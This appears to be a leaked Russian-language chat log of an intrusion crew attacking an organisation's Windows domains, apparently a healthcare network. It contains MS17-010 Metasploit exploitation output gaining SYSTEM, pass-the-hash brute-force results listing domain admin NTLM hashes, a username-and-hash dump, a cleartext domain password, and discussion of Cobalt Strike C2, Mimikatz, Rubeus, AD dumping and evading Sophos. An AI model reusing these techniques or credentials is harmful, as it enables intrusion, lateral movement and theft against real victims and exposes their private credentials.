3119 alasmith a8b89435d1634fd4f45bf671d030f11c 66080
2091 lljerger 7cc9ff2da474e85a3e24018222e1ecfe 66080
3202 jsplichal bcafe80cbf6ea2cab1a96a3612c6cf03 544
2098 metungseth d9840a8afed2ee1b85b8c1dce0a3517c 66080
1265 annlewis 47662aed884a95174de29f642ca62727 512
1847 warncmmu e5bee5800f65d4baf2fd1586ed7d91f9 512
1767 drlokken a73a9b3f676a4d888c4a5588b23a5521 512
1117 NSERV4$ d2984a8f64aba5ad5d32826bd079ae32 4096
3160 cbeebe 810c09ebbcb1062afb2534ecd6ed7a86 544
2033 MRNWKS8$ e25c5c3af53b8a77d1b02bdf95e04e5e 4096
3272 gasaithambi 605e5c6b40e4761041a2b9e86d8f737b 544
1280 janeshaikoski 8384445ee87621f5ec558039a4631833 512
1230 drwswenson 953f520c1123239f61fafd0729e2d1a7 512
3248 nmholte 6b5bdab1c58aba731f34c5aa9893e239 544
1392 drgutzmer 3f9bfd262caed9b0918ff698f290d982 512
1660 ganoyeor 0cfccc49bb0f47f8765a90dfa47ec2b1 512
3607 ajfolstad fb07bda7eb6eb3fa33c9cd7450dc19a3 66080
3265 clstevens c0a90aaacfed09136dcabf7540124dc1 66080
1855 mtvukonich 51a9889746fe107c490c30c0372fb1ed 66048
1187 kjrufer 9d264109febd8b4aaec37f3467cd2180 512
3723 hstark db3d0ebf38ce9c5fb109294ac74eae 66080
2605 jpdinsmore a27cb2e1f9cde5f54f8c23a98e8600b6 66080
2031 MRNWKS5$ f94cf5e2f2c701d33571dc05dc22c1c3 4096
2023 MRNODE0$ e6f7d306302e941d4054d2f64697c775 4096
1576 MRNWKS4$ e2552f80f2a0486087f7250e87827f63 4096
1627 dldulsxr 47a0d7a2228cbe82a7d01204776cafd2 512
3712 kkrog 9de71f50a4cbb09c2e8bf0c21f0d9e67 66080
1199 mdstoesn 8196972a013c829e19ed30d4093a58be 512
3783 jbragland 13852671dbfdaf8f18f5421a04aab22c 66080
1651 jawestxr e666aafcf2ec56a38e12a903bb1778eb 512
3769 shdoesken ce58cc8ec2d8ee3b8588d1f01988ebe6 66080
2001 ndschmid 956d16814a204bb9050b4e1401f3a0ef 512
3289 smjohnson b2f73e099710c5f03524394f7276b01c 544
3735 emonroe bb325c88326c35682915d48170924800 66080
3257 kecian 2f09c790c9569a4e2da502ae93f1234d 544
``третью притянулпервые две не пришлине все прилетаютну дазато есть с чем работатьжаль не на дкну вот)``
Success: 'LRHC\pdsanderson:922.Hibe' Administrator
```
```
10.10.220.45
10.10.35.9
10.10.34.87
10.5.50.180
10.5.50.192
10.10.34.18
10.10.34.167
10.10.34.59
10.5.50.228
10.10.34.35
10.5.66.105
10.10.35.71
10.10.34.173
10.10.35.65
10.10.35.57
```теперь точно im inну всё)на двухопугуну пока что админ только на однома стоп ёпта он ж доменный юзер....да не залочить бытак и в чем проблема::(однако
```
The request will be processed at a domain controller for domain ffmg.local.

Force user logoff how long after time expires?:       Never
Minimum password age (days): 0
Maximum password age (days): 999
Minimum password length: 4
Length of password history maintained: 3
Lockout threshold: 10
Lockout duration (minutes): 1
Lockout observation window (minutes): 1
The command completed successfully.

````922.Hibe`так проще будетщая отпинговал в этом трасте все тачки и отпингованые пропустл на мс17[ ](https://mediaeveryone.com/group/lrhc-org?msg=oNfJkCtLxJjXWyW3a) этона деругие серверные оспроверь)))))))длка не летит``
There is not enough space on the disk.
        0 file(s) copied.

```давай?хош ржакуинтересно)``
LRHC\pdsanderson 8a48ebb4e8aadeb8f71b999ba84ab520
``на втором вот однако``
msf6 auxiliary(admin/smb/ms17_010_command) > set rhosts 10.5.50.192
rhosts => 10.5.50.192
msf6 auxiliary(admin/smb/ms17_010_command) > exploit

[*] 10.5.50.192:445 - Target OS: Windows 5.1
[*] 10.5.50.192:445 - Filling barrel with fish... done
[*] 10.5.50.192:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.5.50.192:445 - [*] Preparing dynamite...
[*] 10.5.50.192:445 - [*] Trying stick 1 (x86)...Boom!
[*] 10.5.50.192:445 - [+] Successfully Leaked Transaction!
[*] 10.5.50.192:445 - [+] Successfully caught Fish-in-a-barrel
[*] 10.5.50.192:445 - <---------------- | Leaving Danger Zone | ---------------->
[10.5.50.192:445 - Reading from CONNECTION struct at: 0x8ae943d8
[*] 10.5.50.192:445 - Built a write-what-where primitive...
[+] 10.5.50.192:445 - Overwrite complete... SYSTEM session obtained!
[+] 10.5.50.192:445 - Service start timed out, OK if running a command or non-service executable...
[*] 10.5.50.192:445 - Getting the command output...
[*] 10.5.50.192:445 - Executing cleanup...
[+] 10.5.50.192:445 - Cleanup was successful
[+] 10.5.50.192:445 - Command completed successfully!
[*] 10.5.50.192:445 - Output for "net localgroup administrators":

Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
FFMG\Domain Admins
FFMG\psanderson
LRHC\pdsanderson
The command completed successfully.
``на первом не прошло`ffmg.local`
```
[+] 10.5.50.2:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2003 3790 Service Pack 2 x86 (32-bit)
 
[+] 10.5.50.192:445 - Host is likely VULNERABLE to MS17-010! - Windows 5.1 x86 (32-bit)
 
[+] 10.10.220.45:445 - Host is likely VULNERABLE to MS17-010! - Windows 5.1 x86 (32-bit)
``Rubeus
```
[*] Target Domain : mcklrh.mig
[X] No users found to Kerberoast!
[X] No users found to AS-REP roast!
 
[*] Target Domain : ffmg.local
[X] No users found to Kerberoast!
[X] No users found to AS-REP roast!
``````
msf6 auxiliary(scanner/smb/smb_ms17_010) > exploit
[10.10.39.73:445 - Host does NOT appear vulnerable.
```
:zany_face:ещё пытаемсякак прошли в траст?```
10.10.39.73
CLINICDC.ffmg.local
````ffmg.local\canderson Gt#832!e`через пару часов к вам еще 2 товарища присоеденятсядавайя поэтому и говорю ща пошукаю как в рубеусе домен указыватьи наоборотинвок керб нетчто рубеус находиттак бывает такоетогда скорее всего нет кербов в другихдас двух трастов?был пустой файл 1 кбайти какой вывод был?и с -domainмы загружали его в тпшнеттак вы на диск роняли и его блочило?так мы же им просили уже через ТаКтИкАл ПоВеРшЕлЛи можешь через инвок керб попроситьpsinjectтак этоща пошукаю на гитеа чет для рубеуса у меня даже не сохранено такого нигдея помню как инвок-кербом просилизабыл что керб можно с траста просить?))или в рубеусе можно соседние домены опрашивать?так тут то зачем рубеус? у нас же отсюда все хэшии отдай @tl2сразу рубеус подрубии пытаться пролезтьща токен буду натягиватьпонялты в трасте или просто сетку притянул?это не траста стопдаже мем поискал)2003 не притягивается:Dну, как говорится
im inпервая часть[ ](https://mediaeveryone.com/group/lrhc-org?msg=eRYWi5Wg6x3hrAZsx) не, хеш для всех одинаковыйна дедике в мсф не заходит чёт[ ](https://mediaeveryone.com/group/lrhc-org?msg=X33pSY4icNZ6ieosT) выше кинул что подошло из имеющихся ЛА и ДА, да и у хеша ведь первая часть от домена зависит же, он пустит такой хэш разве?скрин командной строки[ ](https://mediaeveryone.com/group/lrhc-org?msg=S9kX3FAeMYYh4Gdbs) этих ребят на траст тоже проверьтерезультат смблогина?чтобы ЛА запроситьу нас доступа то к дк нета не скажущас скажу[ ](https://mediaeveryone.com/group/lrhc-org?msg=NNGSmc9G4Ry5P9Ese) в трасте[ ](https://mediaeveryone.com/group/lrhc-org?msg=NNGSmc9G4Ry5P9Ese) не так прочиталмой косякаа я говорю про трасты вашего входоного доменатраст это трасттекущий это входнойкак я понялну текущий траст это ваш входной доменпросто в трастахчто))текущий траст??нетв текущем или трасте?на ДК где?я после того как загрузили и написал, что файл 1 кбайт пустой создаётся[ ](https://mediaeveryone.com/group/lrhc-org?msg=DiJd8WN9qHwQBDX9P) а его на ДК в ЛА нет?да мы грузили`rlschmidt` я под ним снимал инфу, его нет в трастахвы роняете скрипты зачем? грузите их сразу в памятьк вопросу о кербахэто очень хорошотак ну молодцы сняли ад`st.exe -b dc=mcklrh,dc=mig -f "(objectcategory=person)" > C:\Standalone\mcklrh_mig_ad_users.txt` пример командыа тот админ под которым снимали не имеет доступа в трасты?только у меня не отработалочерез -hкороче как я вчера пыталсяхостзапустил cmd от админа и отработал батником адинфо@user7 хостил в какую категорию? @hosts @uploads ?[ ](https://mediaeveryone.com/group/lrhc-org?msg=pyWba7aHGMXYo8gd2) не поверишьдавайте порядкуне залито[ ](https://mediaeveryone.com/group/lrhc-org?msg=hF9NeXsdrJkqW3NSi) так ронять и нельзя[ ](https://mediaeveryone.com/group/lrhc-org?msg=zhkZaHHwvy2xRkCEg) залито куда?как сняли ад инфо сабов?как там с кобой обстоит вопрос` @migrate [pid]````
Invoke-Mimikatz
````Invoke-PSInject.ps1``jyrkwa`ронять его бессмысленнорубеус только уже потом если имея кобуInvoke-Kerb создаёт пустой файл 1 кбайт в обоих трастахсофос жрёт всё роняетсячерез врд тоже не даёт скачать@tl1 это все адинфо если чевсё остальное минуса``
[*][*] 192.168.254.92:445 - 192.168.254.92:445 - Starting SMB login bruteforce
 192.168.254.93:445 - 192.168.254.93:445 - Starting SMB login bruteforce
[192.168.254.92:445 - 192.168.254.92:445 - Correct credentials, but unable to login: 'lrhc\admin:aad3b435b51404eeaad3b435b51404ee:d763de4cc9fe59203df903a5d98f8414',
[*] 192.168.254.93:445 - 192.168.254.93:445 - Correct credentials, but unable to login: 'lrhc\admin:aad3b435b51404eeaad3b435b51404ee:d763de4cc9fe59203df903a5d98f8414',
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\svc-aadc:aad3b435b51404eeaad3b435b51404ee:a5ed4977ab742434bd35761f3cb4c028'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\svc-aadc:aad3b435b51404eeaad3b435b51404ee:a5ed4977ab742434bd35761f3cb4c028'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\AvamarBackupUser:aad3b435b51404eeaad3b435b51404ee:d6538f029c412d2acf4ab547ee69bfce'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\AvamarBackupUser:aad3b435b51404eeaad3b435b51404ee:d6538f029c412d2acf4ab547ee69bfce'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\CDW.Tech1:aad3b435b51404eeaad3b435b51404ee:8e7aca5c0b671015c90656325fb9ea15'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\CDW.Tech1:aad3b435b51404eeaad3b435b51404ee:8e7aca5c0b671015c90656325fb9ea15'
[*] 192.168.254.93:445 - 192.168.254.93:445 - Correct credentials, but unable to login: 'lrhc\CDW.Tech3:aad3b435b51404eeaad3b435b51404ee:2e41b2db123922abbb0b7417c37376f3',
[*] 192.168.254.92:445 - 192.168.254.92:445 - Correct credentials, but unable to login: 'lrhc\CDW.Tech3:aad3b435b51404eeaad3b435b51404ee:2e41b2db123922abbb0b7417c37376f3',
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\PRHADMIN:aad3b435b51404eeaad3b435b51404ee:6cbf599483886475349b36ee6ad42e'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\PRHADMIN:aad3b435b51404eeaad3b435b51404ee:6cbf599483886475349b36ee6ad42e'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\cdw.user01:aad3b435b51404eeaad3b435b51404ee:70c6dad1c8b04eb86f2e10a9a2165132'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\cdw.user01:aad3b435b51404eeaad3b435b51404ee:70c6dad1c8b04eb86f2e10a9a2165132'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\gsnelson:aad3b435b51404eeaad3b435b51404ee:d899502f6f216eb35493afa551999c51'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\gsnelson:aad3b435b51404eeaad3b435b51404ee:d899502f6f216eb35493afa551999c51'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\nmsapps:aad3b435b51404eeaad3b435b51404ee:4ee914b92d24c2e3fc45de8d41df4cbd'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\nmsapps:aad3b435b51404eeaad3b435b51404ee:4ee914b92d24c2e3fc45de8d41df4cbd'
[+][+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\OnPremMigAdmin2:aad3b435b51404eeaad3b435b51404ee:58a6d0022d4a8d3cb892d2ff1754b7aa'
 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\OnPremMigAdmin2:aad3b435b51404eeaad3b435b51404ee:58a6d0022d4a8d3cb892d2ff1754b7aa'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\OnPremMigAdmin3:aad3b435b51404eeaad3b435b51404ee:65336cc5f0fb38689a687aabb17f658f'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\OnPremMigAdmin3:aad3b435b51404eeaad3b435b51404ee:65336cc5f0fb38689a687aabb17f658f'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\PsService:aad3b435b51404eeaad3b435b51404ee:327db612d1d53ac8477a49ae667d523c'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\PsService:aad3b435b51404eeaad3b435b51404ee:327db612d1d53ac8477a49ae667d523c'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\Pssupport01:aad3b435b51404eeaad3b435b51404ee:8c3c72c186ece567004a620aff55d842'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\Pssupport01:aad3b435b51404eeaad3b435b51404ee:8c3c72c186ece567004a620aff55d842'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\radmin:aad3b435b51404eeaad3b435b51404ee:9ed5d85f0709fbf0f343bce62851b726'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\radmin:aad3b435b51404eeaad3b435b51404ee:9ed5d85f0709fbf0f343bce62851b726'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\TMSXE.Service01:aad3b435b51404eeaad3b435b51404ee:a6aea38d860ac5c1e980a7724bd0362e'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\TMSXE.Service01:aad3b435b51404eeaad3b435b51404ee:a6aea38d860ac5c1e980a7724bd0362e'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\UCAdmin:aad3b435b51404eeaad3b435b51404ee:1c7c0878a380b6e004f97cd62af6398b'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\UCAdmin:aad3b435b51404eeaad3b435b51404ee:1c7c0878a380b6e004f97cd62af6398b'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\Administrator:aad3b435b51404eeaad3b435b51404ee:a5ed4977ab742434bd35761f3cb4c028'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\Administrator:aad3b435b51404eeaad3b435b51404ee:a5ed4977ab742434bd35761f3cb4c028'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\CDW.Tech2:aad3b435b51404eeaad3b435b51404ee:3cdfe7a54e9674555e5be6425583783b'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\CDW.Tech2:aad3b435b51404eeaad3b435b51404ee:3cdfe7a54e9674555e5be6425583783b'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\cisadmin:aad3b435b51404eeaad3b435b51404ee:aa5bda0004c32ef20e32cad3d570018f'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\cisadmin:aad3b435b51404eeaad3b435b51404ee:aa5bda0004c32ef20e32cad3d570018f'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\jyrkwa:aad3b435b51404eeaad3b435b51404ee:ce52742a372f62d7100e9ca7b5f13369'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\jyrkwa:aad3b435b51404eeaad3b435b51404ee:ce52742a372f62d7100e9ca7b5f13369'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\OnPremMigAdmin1:aad3b435b51404eeaad3b435b51404ee:f004e3bd8070f91f2e92ff45f69f1525'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\OnPremMigAdmin1:aad3b435b51404eeaad3b435b51404ee:f004e3bd8070f91f2e92ff45f69f1525'
[192.168.254.92:445 - 192.168.254.92:445 - Failed: 'lrhc\pmpetecc:aad3b435b51404eeaad3b435b51404ee:4df15363fbf1bf8218e9e77ee0808ea5',
[192.168.254.93:445 - 192.168.254.93:445 - Failed: 'lrhc\pmpetecc:aad3b435b51404eeaad3b435b51404ee:4df15363fbf1bf8218e9e77ee0808ea5',
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\PsSupport:aad3b435b51404eeaad3b435b51404ee:8c3c72c186ece567004a620aff55d842'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\PsSupport:aad3b435b51404eeaad3b435b51404ee:8c3c72c186ece567004a620aff55d842'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\tms01:aad3b435b51404eeaad3b435b51404ee:a6aea38d860ac5c1e980a7724bd0362e'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\tms01:aad3b435b51404eeaad3b435b51404ee:a6aea38d860ac5c1e980a7724bd0362e'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\WebAdmin:aad3b435b51404eeaad3b435b51404ee:83fdf8f37840cf8e171223c0de1b16eb'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\WebAdmin:aad3b435b51404eeaad3b435b51404ee:83fdf8f37840cf8e171223c0en1b16eb'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\frsecure:aad3b435b51404eeaad3b435b51404ee:6888441821d91affeb5f8cad8a6cad7b'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\frsecure:aad3b435b51404eeaad3b435b51404ee:6888441821d91affeb5f8cad8a6cad7b'
[192.168.254.92:445 - 192.168.254.92:445 - Failed: 'lrhc\lljennbi:aad3b435b51404eeaad3b435b51404ee:2cd71f9ad45c45c9bd25eb978657f867',
[192.168.254.93:445 - 192.168.254.93:445 - Failed: 'lrhc\lljennbi:aad3b435b51404eeaad3b435b51404ee:2cd71f9ad45c45c9bd25eb978657f867',
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
```а компыя пока отойдуи после проверки админов можешь поизучать пш эмпайр+в три заходаладно тогда по очереди сначала ЛА потом текущий потом трастовыйв файл пишутся только логин пассно вроде домен пишется отдельночестно подзабыля просто думаю всех разом хуйнуть или сначала так, потом сяк и сякв файле прописывать домен или в SMBDomain всем отдельно указывать?домен в смб_логине же указывается как отдельная опциятогда всё-таки есть вопросокес доменом трастас доеном текущегот е без доменадаже с 3да?с доменом тожеили как ты ранее сказалчисто ЛА чекаю без доменаа или нет.так вопрос по USERPASS_FILE в смб_логинеокчтобы через пш эмпайр работать в текущем домене вместо кобыя поэтому и спросилтак а че ты мне про него говоришьна вин2003 нет пш))и к слову про пш эмпайр и вин2003ладноили хотя бы новая кобапоговорим дальше)как будет ЛА на дк в том доменепроверь хеши как и договорилисьпока не трогайтак в пш емпайр реально притянуть 2003?пш умет работать с хешеми сразу запасной вариантокейпока чекай админовновая коба будет через пару часовтак воткак админы сети настраивают оборудование и с использованием чего это долгая дискуссияи о приватныхпросто на каких-то открытых источниках с данными о кобах и прочих утилитахчестно не хочу сейчас разбирать эту темупосле закрытия сети кобы сразу пачкаются говномты ж ему в кобу сетку выдала как @user4 работает тогда?вы ими уже давненько работайтеу всех кобы в блнашукаждуюи моя тожевсе прямтак я говорю все кобы пиганулну значит твоя коба таки в бли тратить времялол)```
C:\Users\wevvewe\Desktop>ping google.com

Pinging google.com [172.217.4.238] with 32 bytes of data:
Reply from 172.217.4.238: bytes=32 time=30ms TTL=127
Reply from 172.217.4.238: bytes=32 time=31ms TTL=127
Reply from 172.217.4.238: bytes=32 time=31ms TTL=127
Reply from 172.217.4.238: bytes=32 time=31ms TTL=127

Ping statistics for 172.217.4.238:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 30ms, Maximum = 31ms, Average = 30ms

C:\Users\wevvewe\Desktop>ping fullref.com

Pinging fullref.com [45.128.156.27] with 32 bytes of data:
Reply from 45.128.156.27: bytes=32 time=65ms TTL=127
Reply from 45.128.156.27: bytes=32 time=65ms TTL=127
Reply from 45.128.156.27: bytes=32 time=65ms TTL=127
Reply from 45.128.156.27: bytes=32 time=65ms TTL=127

Ping statistics for 45.128.156.27:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 65ms, Maximum = 65ms, Average = 65ms

C:\Users\wevvewe\Desktop>ping wikibros.com

Pinging wikibros.com [198.18.0.1] with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
``нежели изучать емпайря думаю лучше сделать чем умеюдай пинг домена вышетогда план такойего еще изучить надоне пробовалпш эмайр работает?)и кстати вопрос на миллиондай пинг `fullref.com`гугл пингуетсяно кобы?давпн видит внешку?а скажи вот чтовот так те же ответы23[.]106[.]61 cobaltой блятьвозможно я не так понял что-тоне все сразу сказали конечноа конкретнее?коллеги10[.]10[.] и так далее[.]кто сказал?ну мне тут так сказалитакже в кавычках и апострофахну неправильновот этот ипо аналогичнопо ип?'wikibros.com' cobalt)а как гуглил??засветилсявсё получаетсяwikibros.comпо айпи ничего не даёт
по имени домена отправляет на фандом по мариовсё окну как я и говорюсроси у коллег которые по гоферу работают как понятьда прямо написано: tvoya koba zasvechena tikay s gorodyподобного просто ничего нет?ОСТЕРЕГАЙТЕСЬ ВАМ ПИЗДА ЕСЛИ ВЫ ВИДИТЕ ЭТОТ ДОМЕН/АЙПИтам будет прям написаноесли моя коба засвечена, как это понять?и попутно чекайте админова проверь по айпи домена листа "айпи" кобальтвот недавно проверилроверьдумаю уже давроде нетвоя засветилась?мне твои коллеги недавно сказали что их кобы засвечены100% лосся все наши кобы пинганул с дедика и дк текущего доменаа про кобытам ping wideio.com не отзываетсяя про этотак на 2003 вообще повершела нета текущий видит2003 тпш не видиттвоя коба какой свежести?)но не всеми тпш виднодакобу а мсф видно?а за впном кобу не видноидешь в трасттак дедик за впномделаешь токен админаpthя понимаю в процесс можно обернуть дедик в кобус хэшеми че делатьпотом условно 1-2 подошлидана ЛАначинаюнунети начинаешь по очереди прогонять на оба ДКа ты про кмд5 опять1 к 1с их хешемиты берешь текущих ДА и ЕАтам условный буртпочему?да многоно обращаться то как без возможности создать токен через хэшчто с хэшем можно брутитьэто я понимаюс хэшем тоа smb_login любит хешиа смыслу тех которых я ТОЧНО брутил пароли одинаковыеа хеши для всех)клир креды есть для 4``
Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
admin Administrator AvamarBackupUser
CDW.Tech1 CDW.Tech2 CDW.Tech3
cdw.user01 cisadmin frsecure
gsnelson jyrkwa lljennbi
nmsapps OnPremMigAdmin1 OnPremMigAdmin2
OnPremMigAdmin3 pmpetecc PRHADMIN
PsService PsSupport Pssupport01
radmin tms01 TMSXE.Service01
UCAdmin WebAdmin
The command completed successfully.
```
```
Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
Administrator frsecure jyrkwa
PsService PsSupport Pssupport01
svc-aadc tms01 TMSXE.Service01
UCAdmin
The command completed successfully.
``я уже запутался мы их тут как тольок не называемновую кобу в плане новую сетку или тим сервер?я проверял вчера, но не помню кого
точно проверил
```
lrhc\Administrator
svc-aadc
mcklrh\svc-aadc
lrhc\svc-aadc
```через 2 часа выдам новую кобув общем прогоняем все ДА, ЕА на ДК трастаможно брутить)```
The request will be processed at a domain controller for domain mcklrh.mig.

Force user logoff how long after time expires?:       Never
Minimum password age (days): 0
Maximum password age (days): Unlimited
Minimum password length: 5
Length of password history maintained: 1
Lockout threshold: Never
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: PRIMARY
The command completed successfully.
```дай нет аккаунти безс указанием домена соотвественновзять все ДА из текущего домена и попробова их локальным админа на оба дквижу пока такой вариантсмотриэто не от мс17 зависитда и разве можно добавить через мс17 не в локальную группу?но шанс велик проебать всёя думал об этомно шумный методпотом его снятьсделать своего ДА и под ним быстро залететь в доменкак вариантпотом прибилесли быть точнее 30-40 минутдаа процес висел час?хоть и 0 байтфайлы же создавалисьтак с правами то ок быломожешь проверить в windows\temp чтобы отбросить сомненияно хотя это 2003 мб там прав не хватало на корень...аокно раз ты сказал что и в корень диска пробовал то вариант отпаля же тебе сказал проверь windows\tempну даProgramData это не папкана 2003кстати ржомба только ща заметилвчера делал с впс-ки и выдавало ошибкуща все-же попробую тогда на дедик длл сделать и оттуда в мсф-е enum_ad_* сделаюдумал хоть здесь чего-то выйдет путнегоя поэтому в мсф и перешёлдавсе равно мимо да?я так и пробовал изначальнодедик - доменная тачка - опрос трастаи получается связьчерез вмик под кредами ДА запускаешь файлы которые снимают ад с траста который ты указал в батникеты из дедика прокидываешь файлы для снятия ад внутрь домена на какой нибудь серверлови мысль)это единственная тачка доступнаячто это косяк внутри негоя могу ссылатся на вин2003смб_логином я его чекалон там доменный юзерадмин которого я добавилда не смаривот и траст тебе ничего не даетда и ты сам не доменный пользакмб дело в том что твоя тачка официально не в домене+ из контекста ДАа попробуй сделать запрос через трас из тачки доменачерез метера с трастов я пытаюсьдаа с трастовчерез вми?вотагакак и нтдсудалённос дедикая в текущем домене снимал адфайнд батничкомотривсмыслеты как адфайн запускал если с дедика за впном?енум_ад_юзерспросто с сесией метера на впске это не отрабатываета вопрос такойпока не делайнеща длку новую сделаю тогда, видел, просто туда сесия метера нужна
я мс17 тозаю с дедика сидя за их впном, а метер у меня на впс-ку, думал как-то получится без этого, но придётся на дедик в мсф сесию тянутьсделайте поиск enum_ad_*в msf есть модуль enum_ad_usersкстати точноа еще я не понимаю зачем, у @user8 сесия там есть же?в hosts надоа ты куда залил то?))https не поддерживаетсяhttp://как загружать на тачку файлы через тпш? у меня не получаетсяда вродеа внешку видит?нету чотаа проверька unatted файлыгде вмиком, где мс17и так и сяка ты там команды запускаешь через мс17?еще не снял, мне рубеус режет когда на дедик его закидываю, хотя виндеф я отрубил, а инвок-керб на пшкербы то были?а в трасте в процесах не вижу егов текущем доменеусловно на текущей тачке он в процесах естьхотя с другой стороны в процесах его не видатьно может и софосчто там софосесть еще предположениемне тоже кажется софося и в корень пробовалмм там видимо софос стоита смыслпоробуй переснять ад в эту папкуагатам в основном такие файлыу меня он в терминал не влезвесь дир кидать не буду``
C:\Program Files\Microsoft Azure AD Sync\UIShell>tasklist /s 192.168.254.107 /v
tasklist /s 192.168.254.107 /v

Image Name PID Session Name Session# Mem Usage User Name CPU Time
========================= ======== ================ =========== ============ ================================================== ============
System Idle Process 0 Console 0 16 K NT AUTHORITY\SYSTEM 4152:02:24
System 4 Console 0 268 K NT AUTHORITY\SYSTEM 0:19:18
smss.exe 456 Console 0 496 K NT AUTHORITY\SYSTEM 0:00:00
csrss.exe 876 Console 0 4,236 K NT AUTHORITY\SYSTEM 0:02:07
winlogon.exe 916 Console 0 13,652 K NT AUTHORITY\SYSTEM 0:00:08
services.exe 960 Console 0 66,924 K NT AUTHORITY\SYSTEM 3:56:01
lsass.exe 972 Console 0 27,744 K NT AUTHORITY\SYSTEM 0:28:38
svchost.exe 1152 Console 0 3,568 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 1604 Console 0 4,820 K NT AUTHORITY\NETWORK SERVICE 0:20:17
SavService.exe 1684 Console 0 260,956 K NT AUTHORITY\LOCAL SERVICE 4:45:31
svchost.exe 1428 Console 0 6,224 K NT AUTHORITY\NETWORK SERVICE 0:00:06
svchost.exe 1444 Console 0 7,272 K NT AUTHORITY\LOCAL SERVICE 0:00:02
svchost.exe 1492 Console 0 25,288 K NT AUTHORITY\SYSTEM 1:57:11
spoolsv.exe 556 Console 0 5,704 K NT AUTHORITY\SYSTEM 0:00:52
msdtc.exe 580 Console 0 5.048 K NT AUTHORITY\NETWORK SERVICE 0:00:00
avagent.exe 476 Console 0 9,012 K NT AUTHORITY\SYSTEM 2:05:38
cpqrcmc.exe 1380 Console 0 1,380 K NT AUTHORITY\SYSTEM 0:00:00
vcagent.exe 1408 Console 0 7,800 K NT AUTHORITY\SYSTEM 0:00:00
Tuner.exe 1572 Console 0 2,664 K NT AUTHORITY\SYSTEM 0:00:09
svchost.exe 1732 Console 0 2,644 K NT AUTHORITY\SYSTEM 0:00:00
INETDSRV.exe 1924 Console 0 2,872 K NT AUTHORITY\SYSTEM 0:00:00
machd.exe 1960 Console 0 1,960 K NT AUTHORITY\SYSTEM 0:00:00
nmserver.exe 252 Console 0 3,832 K NT AUTHORITY\SYSTEM 0:00:00
ntfrs.exe 772 Console 0 1,616 K NT AUTHORITY\SYSTEM 0:00:19
svchost.exe 836 Console 0 15,168 K NT AUTHORITY\LOCAL SERVICE 0:11:34
RCMDSVC.EXE 1460 Console 0 1,220 K NT AUTHORITY\SYSTEM 0:00:00
SAVAdminService.exe 1808 Console 0 4,300 K NT AUTHORITY\SYSTEM 0:00:18
snmp.exe 2116 Console 0 7,052 K NT AUTHORITY\SYSTEM 0:04:09
ALsvc.exe 2216 Console 0 1,828 K NT AUTHORITY\SYSTEM 0:00:20
